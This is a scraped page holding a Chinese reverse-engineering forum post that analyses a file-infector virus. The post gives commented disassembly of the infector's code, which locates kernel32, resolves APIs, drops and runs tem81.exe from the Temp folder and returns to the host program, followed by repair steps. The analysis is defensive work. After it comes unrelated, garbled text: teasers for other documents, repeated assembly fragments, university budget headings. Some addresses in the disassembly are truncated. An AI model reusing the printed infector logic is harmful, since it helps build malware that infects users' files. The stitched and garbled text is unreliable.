今天刚发现的, 比较简单, 于是就来简单分析下吧 该感染样本很简单, 新加了个区段放病毒执行代码, 执行病毒代码, 最后跳回原入口点来执行原文件 下面就是感染后的代码的简单分析 : ; =============== S U B R O U T I N E =====================

Size: px
Start display at page:

Download "今天刚发现的, 比较简单, 于是就来简单分析下吧 该感染样本很简单, 新加了个区段放病毒执行代码, 执行病毒代码, 最后跳回原入口点来执行原文件 下面就是感染后的代码的简单分析 : ; =============== S U B R O U T I N E ====================="

Transcription

1 吾爱破解论坛 [LCG] [LSG] 立足软件安全和病毒分析最前端, 丰富的技术版块交相辉映, 由无数加密解密及反病毒爱好者共同维护, 留给世界一抹值得百年回眸的惊 艳, 沉淀百年来计算机应用之精华与优雅, 信息线条与生活质感淡定交融, 任岁月流转, 低调而奢华的技术交流与研究却是亘古不变 标题 : 一个感染样本的简单分析 作者 :ximo

2 今天刚发现的, 比较简单, 于是就来简单分析下吧 该感染样本很简单, 新加了个区段放病毒执行代码, 执行病毒代码, 最后跳回原入口点来执行原文件 下面就是感染后的代码的简单分析 : ; =============== S U B R O U T I N E ======================================= public start start proc near var_44 = dword ptr -44h call $+5.bs:007DC005 pop ebx.bs:007dc006 sub ebx, (offset loc_ ) ; 经典的重定位代码.bs:007DC006 ; ebx=3db000, 以此值作为相应的基址, 来进行相关的计 算.bs:007DC006 ; 在下面的获取各 API 中会看到.bs:007DC00C mov edi, [esp+0] ; 该处的 ESP 值即为入口点的 ESP 值.bs:007DC00C ; 入口点的初始 ESP 值是指向 ExitThread 的.bs:007DC00C ; 该样本正是利用这点, 来暴力搜索来取得 kernel32.dll 的基址的.bs:007DC00F and edi, 0FFFF0000h ; edi==7c bs:007dc00f ; 该值为开始搜索的地址.bs:007DC015.bs:007DC015 loc_7dc015: ; CODE XREF: start+38 j.bs:007dc015 cmp word ptr [edi], 5A4Dh ; 判断是否为 MZ 值, 以次来判断是否是 kernel32.dll 的头部.bs:007DC015 ; 从而取得 kernel32.dll 的地址.bs:007DC01A jnz short loc_7dc02a ; 不是则跳.bs:007DC01C mov esi, edi ; ESI==EDI==GetModuleHandle("kernel32.dll").bs:007DC01C ; 也就是 kernel32.dll 的基址.bs:007DC01E add esi, [esi+3ch] ; ESI=*(esi+3c), 也就是指向 PE Header.bs:007DC021 cmp word ptr [esi], 4550h ; 判断是否为 PE, 以次来验证是否为有效 PE 文件.bs:007DC026 jnz short loc_7dc02a ; 不是则跳.bs:007DC028 jmp short loc_7dc03a ; 得到了 kernel32.dll 的基址.bs:007DC028 ; 下面就可以很容易的得到 GetProcAddress 了.bs:007DC028 ; 下面这段代码就是搜索 kernel32.dll 的输出表, 来得到 GetProcAddress 的地址的.bs:007DC02A ; bs:007dc02a.bs:007dc02a loc_7dc02a: ; CODE XREF: start+1a j.bs:007dc02a ; start+26 j.bs:007dc02a sub edi, 10000h ; 每次向上减 10000h, 来继续暴力搜索 kernel32.dll 的基址.bs:007DC030 cmp edi, h ; 比较下界为 h.bs:007DC036 jb short loc_7dc03a ; 得到了 kernel32.dll 的基址

3 .bs:007dc036 ; 下面就可以很容易的得到 GetProcAddress 了.bs:007DC036 ; 下面这段代码就是搜索 kernel32.dll 的输出表, 来得到 GetProcAddress 的地址的.bs:007DC038 jmp short loc_7dc015 ; 循环去搜索.bs:007DC038 ; 以上这段代码就是利用原始入口的 ESP 制向 ExitThread.bs:007DC038 ; 而 ExitThread 位于 kernel32.dll.bs:007dc038 ; 以次来暴力搜索, 得到 kernel32.dll 的基址的 ; loc_7dc03a: ; CODE XREF: start+28 j ; start+36 j mov dword ptr ds:(loc_4011d8+1)[ebx], edi ; 得到了 kernel32.dll 的基址 ; 下面就可以很容易的得到 GetProcAddress 了 ; 下面这段代码就是搜索 kernel32.dll 的输出表, 来得到 GetProcAddress 的地址的.bs:007DC040 mov esi, [esi+78h] ; 读取 kernel32.dll 的输出表.bs:007DC040 ; ESI 的值为输出表的 RVA,EDI 为 ImageBase.bs:007DC043 add esi, edi.bs:007dc045 push esi.bs:007dc046 mov ebp, [esi+18h].bs:007dc049 mov esi, [esi+20h].bs:007dc04c add esi, edi.bs:007dc04e xor edx, edx.bs:007dc050.bs:007dc050 loc_7dc050: ; CODE XREF: start+75 j.bs:007dc050 push esi.bs:007dc051 mov edi, [esi].bs:007dc053 add edi, dword ptr ds:(loc_4011d8+1)[ebx].bs:007dc059 lea esi, dword_40119e[ebx] ; GetProcAddress 字符串.bs:007DC05F mov ecx, 0Fh.bs:007DC064 repe cmpsb.bs:007dc066 jnz short loc_7dc06e.bs:007dc068 pop esi.bs:007dc069 mov edx, esi.bs:007dc06b pop esi.bs:007dc06c jmp short loc_7dc07f ; 获取了 GetProcAddress 后, 下面就是读取相关 API 了.bs:007DC06E ; bs:007dc06e.bs:007dc06e loc_7dc06e: ; CODE XREF: start+66 j.bs:007dc06e pop esi.bs:007dc06f add esi, 4.bs:007DC072 inc edx.bs:007dc073 cmp edx, ebp.bs:007dc075 jb short loc_7dc050 ; 循环进行搜索, 以得到 GetProcAddress 地址.bs:007DC077 sub esp, 4

4 .bs:007dc07a jmp loc_7dc199 ; 若搜索不到, 直接跳回去到原始入口点.bs:007DC07A ; 此地方可以作为修复感染的突破点之一.bs:007DC07A ; 把 007DC075 的 jb 改 jmp, 即可让其不执行危险的动作.bs:007DC07F ; bs:007dc07f.bs:007dc07f loc_7dc07f: ; CODE XREF: start+6c j.bs:007dc07f sub edx, [esi+20h] ; 获取了 GetProcAddress 后, 下面就是读取相关 API 了.bs:007DC082 mov eax, dword ptr ds:(loc_4011d8+1)[ebx].bs:007dc088 sub edx, eax.bs:007dc08a shr edx, 1.bs:007DC08C add edx, [esi+24h].bs:007dc08f add edx, eax.bs:007dc091 movzx eax, word ptr [edx].bs:007dc094 shl eax, 2.bs:007DC097 add eax, [esi+1ch].bs:007dc09a add eax, dword ptr ds:(loc_4011d8+1)[ebx].bs:007dc0a0 mov eax, [eax].bs:007dc0a2 add eax, dword ptr ds:(loc_4011d8+1)[ebx] ; eax 的值即为 GetProcAddress 的地址.bs:007DC0A8 mov edi, eax.bs:007dc0aa mov ebp, esp.bs:007dc0ac mov edx, dword ptr ds:(loc_4011d8+1)[ebx].bs:007dc0b2 lea eax, (loc_4011ab+2)[ebx] ; 指向 GetTempPathA 字符串.bs:007DC0B8 push eax.bs:007dc0b9 push edx.bs:007dc0ba call edi ; 调用 GetProcAddress 来获取 GetTempPathA 地址.bs:007DC0BA ; 以下均为这种形式 :.bs:007dc0ba ; eax=getprocaddress("edi").bs:007dc0bc sub esp, 104h.bs:007DC0C2 push esp.bs:007dc0c3 push 104h.bs:007DC0C8 call eax ; 调用 GetTempPathA.bs:007DC0CA lea eax, (loc_4011b8+2)[ebx] ; 指向字符串 lstrcata.bs:007dc0d0 push eax.bs:007dc0d1 mov edx, dword ptr ds:(loc_4011d8+1)[ebx].bs:007dc0d7 push edx.bs:007dc0d8 call edi.bs:007dc0da lea ecx, (loc_4011c2+1)[ebx] ; tem81.exe.bs:007dc0e0 push ecx.bs:007dc0e1 mov ecx, esp.bs:007dc0e3 add ecx, 4.bs:007DC0E6 push ecx.bs:007dc0e7 call eax.bs:007dc0e9 lea eax, (loc_4011cb+2)[ebx] ; CreateFileA.bs:007DC0EF push eax.bs:007dc0f0 mov edx, dword ptr ds:(loc_4011d8+1)[ebx]

5 .bs:007dc0f6 push edx.bs:007dc0f7 call edi.bs:007dc0f9 mov ecx, esp.bs:007dc0fb push 0.bs:007DC0FD push 80h.bs:007DC102 push 2.bs:007DC104 push 0.bs:007DC106 push 0.bs:007DC108 push 0C h.bs:007DC10D push ecx.bs:007dc10e call eax ; 创建 C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tem81.exe.bs:007DC110 mov esi, eax.bs:007dc112 lea ecx, (loc_ )[ebx] ; WriteFile.bs:007DC118 push ecx.bs:007dc119 push ecx.bs:007dc11a mov edx, dword ptr ds:(loc_4011d8+1)[ebx].bs:007dc120 push edx.bs:007dc121 call edi.bs:007dc123 pop ecx.bs:007dc124 push 0.bs:007DC126 push ecx.bs:007dc127 add ecx, 0Ah.bs:007DC12A mov edx, [ecx] ; 所要写入内容地址为 [ECX]=[007DC201].bs:007DC12C push edx.bs:007dc12d push ecx.bs:007dc12e mov edx, 905A4Dh.bs:007DC133 mov [ecx], edx.bs:007dc135 push esi.bs:007dc136 call eax.bs:007dc138 lea eax, loc_4011ec[ebx] ; CloseHandle.bs:007DC13E push eax.bs:007dc13f mov edx, dword ptr ds:(loc_4011d8+1)[ebx].bs:007dc145 push edx.bs:007dc146 call edi.bs:007dc148 push esi.bs:007dc149 call eax.bs:007dc14b lea eax, loc_4011dd[ebx] ; CreateProcessA.bs:007DC151 push eax.bs:007dc152 mov edx, dword ptr ds:(loc_4011d8+1)[ebx].bs:007dc158 push edx.bs:007dc159 call edi.bs:007dc15b sub esp, 44h.bs:007DC15E mov edx, esp.bs:007dc160 mov esi, 0

6 .bs:007dc165 mov ecx, 11h.bs:007DC16A.bs:007DC16A loc_7dc16a: ; CODE XREF: start+16f j.bs:007dc16a mov [edx], esi.bs:007dc16c add edx, 4.bs:007DC16F loop loc_7dc16a.bs:007dc171 mov edx, 44h.bs:007DC176 mov [esp+44h+var_44], edx.bs:007dc179 sub esp, 10h.bs:007DC17C mov edx, esp.bs:007dc17e push esp.bs:007dc17f add edx, 10h.bs:007DC182 push edx.bs:007dc183 push 0.bs:007DC185 push 0.bs:007DC187 push 0.bs:007DC189 push 0.bs:007DC18B push 0.bs:007DC18D push 0.bs:007DC18F push 0.bs:007DC191 add edx, 44h.bs:007DC194 push edx.bs:007dc195 call eax ; 创建进程, 来运行刚创建的文件 tem81.exe.bs:007dc197 mov esp, ebp.bs:007dc199.bs:007dc199 loc_7dc199: ; CODE XREF: start+7a j.bs:007dc199 jmp sub_ ; 病毒代码执行完毕, 跳到原始入口点去执行.bs:007DC199 start endp.bs:007dc199.bs:007dc199 ; 修复也很简单 : 1. 修改入口点地址 : 设原入口地址为 EP, 读取 EP+19Ah 的值 ( 读取 4 个字节 ) 为 A 则修改后的值为 :EP+198h+5h+A 以该样本为例 : 入口点 RVA=003DC000, 转化成 offset=003c3000 读取 offset+19ah=3c319a 处的值为 (4 字节 ):F5 B1 C8 FF, 即 FFC8B1F5 则新入口 RVA=3DC h+5h+FFC8B1F5=3DC19D-(FFFFFFFF-FFC8B1F5)=3DC19D-374E0A=67393 则修改新入口点的值为 截去被病毒新加的.bs 区段

7

,768 32,767 32K JMP Jnnn (386+) LOOP CALL [Label:] JMP short/near/far address L10: jmp jmp L20: L10 L20

,768 32,767 32K JMP Jnnn (386+) LOOP CALL [Label:] JMP short/near/far address L10: jmp jmp L20: L10 L20 (Jump) (Loop) (Conditional jump) CMP CALL AND SAR/SHR TEST JMP NOT SAL/SHL Jnnn* OR RCR/ROR LOOP XOR RCL/ROL RETn * nnn, JNE JL -128 127-32,768 32,767 32K JMP Jnnn (386+) LOOP CALL [Label:] JMP short/near/far

More information

漏 洞 攻 防 EXPLOIT ATTACK & DEFENCE 栏 目 编 辑 脚 本 小 子 scriptsboy@hacker.com.cn HEAD 部 分 大 小 当 然 也 就 是 固 定 的 18200H 如 果 要 提 取 出 HEAD, 我 们 可 以 选 中 前 18200H 字

漏 洞 攻 防 EXPLOIT ATTACK & DEFENCE 栏 目 编 辑 脚 本 小 子 scriptsboy@hacker.com.cn HEAD 部 分 大 小 当 然 也 就 是 固 定 的 18200H 如 果 要 提 取 出 HEAD, 我 们 可 以 选 中 前 18200H 字 适 合 读 者 : 入 侵 爱 好 者 溢 出 爱 好 者 前 置 知 识 : 汇 编 语 言 缓 冲 区 溢 出 基 本 原 理 文 / 图 何 永 强 Word 畸 形 数 据 结 构 溢 出 漏 洞 分 析 与 利 用 以 前 都 是 写 远 程 溢 出 漏 洞, 感 觉 也 该 换 换 口 味 了 事 实 上,2005 年 以 来 的 远 程 溢 出 漏 洞, 如 MS05-039 MS06-040

More information

来源 :byxxdrls 文件为被感染的 sreng 可执行文件 MD5: 0xD96C28619A2BBA73C8B439039E1B5419 大小 : 2,232,320 bytes HOSTS 文件被修改 jl.chura.pl #

来源 :byxxdrls 文件为被感染的 sreng 可执行文件 MD5: 0xD96C28619A2BBA73C8B439039E1B5419 大小 : 2,232,320 bytes HOSTS 文件被修改 jl.chura.pl # 吾爱破解论坛 [LCG] [LSG] 立足软件安全和病毒分析最前端, 丰富的技术版块交相辉映, 由无数加密解密及反病毒爱好者共同维护, 留给世界一抹值得百年回眸的惊艳, 沉淀百年来计算机应用之精华与优雅, 信息线条与生活质感淡定交融, 任岁月流转, 低调而奢华的技术交流与研究却是亘古不变 标题 :Win32.Virut.ce 不完整报告 作者 :roxiel 来源 :byxxdrls 文件为被感染的

More information

DbgPrint 函数流程分析

DbgPrint 函数流程分析 DbgPrint 函数流程分析 by 小喂 1 DbgPrint 函数流程分析 前言 Windows 下编写内核驱动时经常用到 DbgPrint 函数输出一些调试信息, 用来辅助调试 当正在用 WinDbg 内核调 试时, 调试信息会输出到 WinDbg 中 或者利用一些辅助工具也能看到输出的调试信息, 比如 Sysinternals 公司的 DebugView 工具 本文分析了 Vista 系统上

More information

<4D F736F F D20CEC4BCFEBCB6B6F1D2E2B4FAC2EBC9A8C3E8D2FDC7E6D6D0B5C4BCD3BFC7CAB6B1F0BCBCCAF52E646F6378>

<4D F736F F D20CEC4BCFEBCB6B6F1D2E2B4FAC2EBC9A8C3E8D2FDC7E6D6D0B5C4BCD3BFC7CAB6B1F0BCBCCAF52E646F6378> 文件级恶意代码扫描引擎中的加壳识别技术 安天实验室 Swordlea 2003 年 12 月 25 日 在文件级恶意代码扫描引擎的设计与实现过程中, 加壳后样本的特征选取和识别是较为棘手的问题 恶意代码的制作者为了使其作品传播更广, 往往使用软件加壳的方式 样本被加壳以后, 其原有特征码被变形或彻底隐藏, 在一定程度中增加了样本分析与识别的难度 目前反病毒公司在对加壳后样本的处理上一般采用以下几种方式

More information

一 学 校 基 本 情 况 目 录 二 部 门 预 算 报 表 ( 一 ) 收 支 总 表 ( 二 ) 收 入 总 表 ( 三 ) 支 出 总 表 ( 四 ) 财 政 拨 款 支 出 表 三 部 门 预 算 报 表 说 明 ( 一 ) 收 支 总 表 说 明 ( 二 ) 收 入 总 表 说 明 (

一 学 校 基 本 情 况 目 录 二 部 门 预 算 报 表 ( 一 ) 收 支 总 表 ( 二 ) 收 入 总 表 ( 三 ) 支 出 总 表 ( 四 ) 财 政 拨 款 支 出 表 三 部 门 预 算 报 表 说 明 ( 一 ) 收 支 总 表 说 明 ( 二 ) 收 入 总 表 说 明 ( 浙 江 大 学 2016 年 部 门 预 算 2016 年 5 月 1 一 学 校 基 本 情 况 目 录 二 部 门 预 算 报 表 ( 一 ) 收 支 总 表 ( 二 ) 收 入 总 表 ( 三 ) 支 出 总 表 ( 四 ) 财 政 拨 款 支 出 表 三 部 门 预 算 报 表 说 明 ( 一 ) 收 支 总 表 说 明 ( 二 ) 收 入 总 表 说 明 ( 三 ) 支 出 总 表 说 明

More information

目 录 一 学 校 基 本 情 况 二 2016 年 预 算 报 表 ( 一 ) 中 南 大 学 收 支 预 算 总 表 ( 二 ) 中 南 大 学 收 入 预 算 表 ( 三 ) 中 南 大 学 支 出 预 算 表 ( 四 ) 中 南 大 学 财 政 拨 款 支 出 预 算 表 三 2016 年

目 录 一 学 校 基 本 情 况 二 2016 年 预 算 报 表 ( 一 ) 中 南 大 学 收 支 预 算 总 表 ( 二 ) 中 南 大 学 收 入 预 算 表 ( 三 ) 中 南 大 学 支 出 预 算 表 ( 四 ) 中 南 大 学 财 政 拨 款 支 出 预 算 表 三 2016 年 中 南 大 学 2016 年 部 门 预 算 二 一 六 年 五 月 1 目 录 一 学 校 基 本 情 况 二 2016 年 预 算 报 表 ( 一 ) 中 南 大 学 收 支 预 算 总 表 ( 二 ) 中 南 大 学 收 入 预 算 表 ( 三 ) 中 南 大 学 支 出 预 算 表 ( 四 ) 中 南 大 学 财 政 拨 款 支 出 预 算 表 三 2016 年 预 算 情 况 说 明 (

More information

信息参考

信息参考 内 部 资 料 注 意 保 密 信 息 参 考 2016 年 第 1 期 ( 总 第 26 期 ) 党 政 办 公 室 编 2016 年 2 月 29 日 工 作 要 点 教 育 部 2016 年 工 作 要 点 (1) 中 共 北 京 市 委 教 育 工 作 委 员 会 北 京 市 教 育 委 员 会 北 京 市 人 民 政 府 教 育 督 导 室 2015 年 工 作 要 点 (10) 中 共

More information

Microsoft Word - 15dbtb007

Microsoft Word - 15dbtb007 第 7 期 中 共 浙 江 大 学 委 员 会 办 公 室 2015 年 12 月 16 日 按 :2015 年 12 月 15 日, 学 校 召 开 了 2015 年 党 建 工 作 会 议, 党 委 书 记 金 德 水 同 志 作 出 重 要 讲 话, 深 刻 分 析 了 学 校 改 革 发 展 面 临 的 形 势, 对 加 强 和 改 进 学 校 党 的 建 设 进 行 了 部 署, 对 充

More information

ROP_bamboofox.key

ROP_bamboofox.key ROP Return Oriented Programming Lays @ BambooFox Who Am I Lays / L4ys / 累死 - l4ys.tw Reverse Engineering BambooFox / HITCON Outline Buffer Overflow ret2libc / ret2text Return Oriented Programming Payload

More information

42 2141601026 2016 11 27 2 1.1............................................. 2 1.2....................................... 2 1.2.1......................................... 2 1.3.............................................

More information

06721 main() lock pick proc() restart() [2][4] MINIX minix2.0 GDT, IDT irq table[] CPU CPU CPU CPU (IDTR) idt[] CPU _hwint00:! Interrupt

06721 main() lock pick proc() restart() [2][4] MINIX minix2.0 GDT, IDT irq table[] CPU CPU CPU CPU (IDTR) idt[] CPU _hwint00:! Interrupt MINIX ( 730000) ( 730000) MINIX MINIX2.0 MINIX : MINIX TP3 1 MINIX UNIX Tanenbaum UNIX MINIX LINUX MINIX MINIX MINIX1.0 UNIX V7 MINIX2.0[3] POSIX MINIX3 MINIX Gabriel A. Wainer 1994-1995 [5] 1998 I/O 2002

More information

且编写我们的利用程序, 到最后, 会简单讲一下, 这个漏洞的修补. 首先我们来了解下溢出产生的原因. 打开 windbg, 附加到 msue 进程上, 然后在 kernel!readfile 处下断点, 再用 muse 打开我们之前做好的 test.m3u( 注 : 在这个过程中, 会多次断在 Re

且编写我们的利用程序, 到最后, 会简单讲一下, 这个漏洞的修补. 首先我们来了解下溢出产生的原因. 打开 windbg, 附加到 msue 进程上, 然后在 kernel!readfile 处下断点, 再用 muse 打开我们之前做好的 test.m3u( 注 : 在这个过程中, 会多次断在 Re MUSE v4.9.0.006 (.m3u) 本地溢出漏洞的分析和利用 文 : 冰雪风谷文件格式溢出漏洞一直是黑客门攻击的热点, 从暴风影音播放器到 qq 播放器以及其它的各种播放器, 都被人暴过相关的漏洞. 至于造成漏洞的原因, 大部分是由于往栈里拷贝字符的时候, 没有检查字符串的长度, 导致拷贝的长度大于缓冲区的长度, 于是造成了溢出. 当然, 还有部分是整数溢出, 出现在一些有无符号数混合使用,

More information

标题

标题 4 短 篇 小 说 : 文 学 常 态 下 的 精 益 求 精 摘 要 : 2014 年 对 短 篇 小 说 而 言 是 一 个 常 态 的 文 学 时 段, 真 正 做 到 精 益 求 精 的 短 篇 小 说 还 是 太 少 作 家 的 立 场 表 现 了 对 于 真 善 美 的 维 护, 对 于 正 义 平 等 自 由 等 人 类 共 同 精 神 价 值 的 捍 卫 的 倾 向 因 此 作 家

More information

1 CPU interrupt INT trap CPU exception

1 CPU interrupt INT trap CPU exception 1 CPU interrupt INT trap CPU exception 2 X86 CPU gate 64 16 1 2 5 8 16 16 P DPL 00101 TSS 101 DPL P 1 64 16 1 2 1 1 3 3 5 16 16 16 P DPL 0 D 000 16 110 111 100 D 1=32 0=16 DPL P 1 INT DPL1>=CPL>=DPL CPU

More information

学习MSP430单片机推荐参考书

学习MSP430单片机推荐参考书 MSP430 16 MSP430 C MSP430 C MSP430 FLASH 16 1 CPU 16 ALU 16 PC SP SR R4~R15 2 3 00-FFH 100-1FFH 4 5 1 2 51 24 27 6 1 2 3 4 5 6 4 12 SR SP SR CPU SR CPU C Z N GIE CPUOff CPU OscOff SCG0 SCG1 CPU EXIT SP

More information

Linux kernel exploit研究和探索

Linux kernel exploit研究和探索 Linux kernel exploit DOC alert7 PPT e4gle 2002-12-2 1 2002-12-2 2 Linux kernel exploit kernel exploit exploit exploit exploit (Kernel Buffer Overflow) (Kernel

More information

Microsoft Word - “调戏”反遭“反调戏”—记Visual Toolbar 的破解过程.doc

Microsoft Word - “调戏”反遭“反调戏”—记Visual Toolbar 的破解过程.doc 调戏 反遭 反调戏 记 Visual Toolbar 的破解过程 cntrump 由于要做工具栏, 在网上找到了 Visual Toolbar 这个工具, 看了介绍挺不错的, 下载回 来之后发现软件要注册, 但是这是个 04 年的软件, 已经没法向作者购买了, 更重要的原因 是俺还在失业中, 吃饭都成问题了, 哪里还有钱注册呀 ~~ 用 PEID 检测是 UPX 的老壳, 直接手脱, 过程不是重点反正能脱壳就行了

More information

<4D6963726F736F667420576F7264202D20C7B6C8EBCABDCFB5CDB3C9E8BCC6CAA6B0B8C0FDB5BCD1A75FD1F9D5C22E646F63>

<4D6963726F736F667420576F7264202D20C7B6C8EBCABDCFB5CDB3C9E8BCC6CAA6B0B8C0FDB5BCD1A75FD1F9D5C22E646F63> 因 为 路 过 你 的 路, 因 为 苦 过 你 的 苦, 所 以 快 乐 着 你 的 快 乐, 追 逐 着 你 的 追 逐 内 容 简 介 本 书 根 据 2005 年 下 半 年 实 施 的 全 国 计 算 机 技 术 与 软 件 专 业 技 术 资 格 ( 水 平 ) 考 试 嵌 入 式 系 统 设 计 师 级 考 试 大 纲 精 神, 在 深 入 研 究 历 年 计 算 机 技 术 与 软

More information

<4D6963726F736F667420576F7264202D20D1A7C9FACAD6B2E1B8C4D7EED6D5A3A8B4F8B1EDB8F1BCD3D2B3C2EBB0E6A3A9372E3239>

<4D6963726F736F667420576F7264202D20D1A7C9FACAD6B2E1B8C4D7EED6D5A3A8B4F8B1EDB8F1BCD3D2B3C2EBB0E6A3A9372E3239> 北 京 科 技 大 学 学 生 手 册 ( 本 科 生 ) 学 生 工 作 部 ( 处 ) 二 〇 一 五 年 七 月 北 京 科 技 大 学 学 生 手 册 ( 本 科 生 ) 编 委 会 主 编 于 成 文 盛 佳 伟 编 委 ( 按 姓 氏 笔 画 排 序 ) 丁 煦 生 尹 兆 华 龙 洋 史 立 伟 曲 涛 刘 晓 东 杜 振 民 杨 雄 何 进 宋 波 张 卫 冬 张 卫 钢 张 文

More information

桂林市劳动和社会保障局关于

桂林市劳动和社会保障局关于 桂 林 市 人 力 资 源 和 社 会 保 障 局 文 件 市 人 社 发 2012 60 号 桂 林 市 人 力 资 源 和 社 会 保 障 局 关 于 2012 年 秘 书 等 十 八 个 职 业 国 家 职 业 资 格 全 国 全 区 统 一 考 试 有 关 问 题 的 通 知 各 有 关 单 位 : 根 据 自 治 区 人 力 资 源 和 社 会 保 障 厅 关 于 做 好 2012 年 国

More information

Microsoft Word 年度选拔硕博连读研究生的通知.doc

Microsoft Word 年度选拔硕博连读研究生的通知.doc 南 工 (2015) 研 字 第 3 号 关 于 选 拔 2015 年 度 硕 博 连 读 研 究 生 的 通 知 各 有 关 学 院 : 为 适 应 我 国 构 建 社 会 主 义 和 谐 社 会 和 建 设 创 新 型 国 家 的 战 略 需 要, 加 快 拔 尖 创 新 人 才 的 培 养, 我 校 决 定 继 续 推 荐 和 选 拔 一 批 基 本 素 质 好 业 务 基 础 强 品 学 兼

More information

!!"#! " # $%%&#! ()*+ %& %,&,, &!!# # # #! "# ## # #! $# # #! %#! &# -,.$# /! 0(1 $%%& %&23%2!!!!!!!!!!!!!! %,% 4&%.&.22!!! &! 2%% 2,% %.32!,%%%,,! 56

!!#!  # $%%&#! ()*+ %& %,&,, &!!# # # #! # ## # #! $# # #! %#! &# -,.$# /! 0(1 $%%& %&23%2!!!!!!!!!!!!!! %,% 4&%.&.22!!! &! 2%% 2,% %.32!,%%%,,! 56 !! !!"#! " # $%%&#! ()*+ %& %,&,, &!!# # # #! "# ## # #! $# # #! %#! &# -,.$# /! 0(1 $%%& %&23%2!!!!!!!!!!!!!! %,% 4&%.&.22!!! &! 2%% 2,% %.32!,%%%,,! 5667 "" 888# 597# 9:;#

More information

易语言逆向分析

易语言逆向分析 易语言介绍 易语言功能强大, 具有多个支持库, 可以很快的进行产品开发 与其它语言相比, 学习难度也低一些, 目前很多的外 挂程序, 核心功能编写为动态链接库, 界面开发的工作会使用易语言来进行 易语言编写的程序, 最终的功能实现, 还是需要调用系统的动态链接库 我对易语言的理解是对系统动态库中常用的 功能进行了一次封装, 使其使用起来更加方便简单 由于易语言本身带有多个支持库, 使用我们的逆向分析变得困难重重

More information

> u eip l 3 002f2aa9 90 nop 002f2aaa 90 nop >!chkimg -d -lo 1 ping // 检查文件是否被篡改? 002f2aa7-002f2aaa 4 bytes - ping!maincrtstartup [ e :f0 cc 9

> u eip l 3 002f2aa9 90 nop 002f2aaa 90 nop >!chkimg -d -lo 1 ping // 检查文件是否被篡改? 002f2aa7-002f2aaa 4 bytes - ping!maincrtstartup [ e :f0 cc 9 在 WINDBG 中定位 ExceptionAddress 核心技术部陈庆 关键字 : 调试异常 windbg second chance ExceptionAddress 摘要 : 在 windbg 中调试时, 碰上 second chance 时, 栈回溯已经看不到与 ExceptionAddress 直接相关的信息, 但我们调试的目的就是要找到 ExceptionAddress 本文介绍了几种通用思路来解决这个问题

More information

Microsoft Word - xiuxinduanyu-2-doc.doc

Microsoft Word - xiuxinduanyu-2-doc.doc 明 慧 专 题 文 章 汇 编 这 些 文 章 是 各 位 大 法 弟 子 作 者 在 各 自 在 修 炼 过 程 中 在 当 时 所 在 层 次 的 认 识 ; 我 们 收 集 成 册, 谨 供 不 经 常 访 问 明 慧 网 的 同 修 参 考 师 父 的 法 才 是 指 导 大 法 弟 子 修 炼 提 高 的 根 本, 广 泛 阅 读 明 慧 网 上 更 多 同 修 的 修 炼 交 流, 能

More information

1.5招募说明书(草案)

1.5招募说明书(草案) PUBLIC 2014 1 PUBLIC - 1 2014 1 PUBLIC - 2 2014 1 PUBLIC - 3 2014 1 PUBLIC - 4 2014 1 PUBLIC - 5 2014 1 PUBLIC - 6 2014 1 PUBLIC - 7 2014 1 PUBLIC - 8 2014 1 PUBLIC - 9 2014 1 PUBLIC - 10 2014 1 PUBLIC

More information

中国矿业大学研招办

中国矿业大学研招办 中 国 矿 业 大 学 研 究 生 院 中 国 矿 业 大 学 2016 年 硕 士 研 究 生 复 试 录 取 工 作 实 施 办 法 各 学 院 : 研 究 生 院 通 字 [2016]5 号 为 做 好 2016 年 硕 士 研 究 生 复 试 录 取 工 作, 根 据 教 育 部 和 江 苏 省 研 究 生 招 生 工 作 有 关 文 件 精 神, 结 合 我 校 实 际 情 况, 制 定

More information

药大研〔2015〕78号

药大研〔2015〕78号 中 国 药 科 大 学 学 位 授 权 点 合 格 评 估 (2014-2019 年 ) 工 作 方 案 一 评 估 工 作 - 2 - 二 评 估 范 围 ( 一 )2014-2019 年 学 位 授 权 点 合 格 评 估 范 围 : - 3 - ( 二 )2014-2015 年 学 位 授 权 点 专 项 评 估 范 围 : 三 评 估 组 织 - 4 - 学 位 授 权 点 名 称 学 位

More information

幻灯片 1

幻灯片 1 3 8086 Tel:2656809 tjx@csu.edu.cn 2005-9-14 1 2005-9-14 2 8086 8 8086 8086 7 2005-9-14 3 PC 2005-9-14 4 2005-9-14 5 81616 2005-9-14 6 [ ] MOV AX, 3064H AX=3064H 16AX OP 64H 30H 2005-9-14 7 16 AX BX CX

More information

<4D6963726F736F667420576F7264202D2066696E616CD6D0BAA3BFC9D7AABBBBD5AEC8AFD5AEC8AFBBF9BDF0BBF9BDF0BACFCDAC2E646F63>

<4D6963726F736F667420576F7264202D2066696E616CD6D0BAA3BFC9D7AABBBBD5AEC8AFD5AEC8AFBBF9BDF0BBF9BDF0BACFCDAC2E646F63> 基 金 管 理 人 : 中 海 基 金 管 理 有 限 公 司 基 金 托 管 人 : 中 国 农 业 银 行 股 份 有 限 公 司 目 录 一 前 言... 3 二 释 义... 5 三 基 金 的 基 本 情 况... 10 四 基 金 份 额 的 发 售 与 认 购... 12 五 基 金 备 案... 14 六 基 金 份 额 的 申 购 与 赎 回... 15 七 当 事 人 及 权 利

More information

Microsoft PowerPoint - 05-第五讲-寻址方式.pptx

Microsoft PowerPoint - 05-第五讲-寻址方式.pptx 第五讲 授课教师 : 陆俊林王箫音 2012 年春季学期 主要内容 一 寻址方式概述 二 数据的寻址方式 三 转移地址的寻址方式 教材相关章节 : 微型计算机基本原理与应用 ( 第二版 ) 第 4 章寻址方式与指令系统 1 主要内容 一 寻址方式概述 二 数据的寻址方式 三 转移地址的寻址方式 2 指令的组成 指令由操作码和操作数两部分组成 操作码操作数 MOV AX, 8726H ADD AX,

More information

红 罐 王 老 吉 品 牌 定 位 战 略 来 源 : 成 美 营 销 官 网 品 牌 释 名 凉 茶 是 广 东 广 西 地 区 的 一 种 由 中 草 药 熬 制, 具 有 清 热 去 湿 等 功 效 的 药 茶 在 众 多 老 字 号 凉 茶 中, 又 以 王 老 吉 最 为 著 名 王 老 吉 凉 茶 发 明 于 清 道 光 年 间, 至 今 已 有 175 年, 被 公 认 为 凉 茶 始

More information

(2) Function 0BH: Function 0CH: (pixel, picture element) Function 0DH: Function 0FH: Function 13H:

(2) Function 0BH: Function 0CH: (pixel, picture element) Function 0DH: Function 0FH: Function 13H: (1) INT 10H Function 00H: Function 01H: Function 02H: Function 03H: Function 05H: Function 06H: Function 07H: Function 08H: Function 09H: Function 0AH: (2) Function 0BH: Function 0CH: (pixel, picture element)

More information

